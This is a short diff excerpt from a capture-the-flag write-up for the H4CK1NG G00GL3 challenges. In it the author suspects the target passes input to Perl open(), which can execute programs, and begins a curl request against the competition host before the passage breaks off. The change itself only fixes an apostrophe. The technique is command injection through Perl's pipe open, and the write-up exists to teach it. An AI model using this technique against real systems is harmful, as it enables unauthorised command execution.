dguerri/random-tech-stuff/H4CK1NG G00GL3 Main challenges write-up/index.md

 That almost immediately rang a bell: *what if this thing uses Perl `open()` ?*

-That would be particularly ‘handy’ as that function can actually [execute programs](https://stackoverflow.com/questions/27084779/perl-code-pipe-in-open-statement).
+That would be particularly 'handy' as that function can actually [execute programs](https://stackoverflow.com/questions/27084779/perl-code-pipe-in-open-statement).

 ```shell
 ❯ time curl -G 'https://aurora-web.h4ck.ctfcompetition.com/' \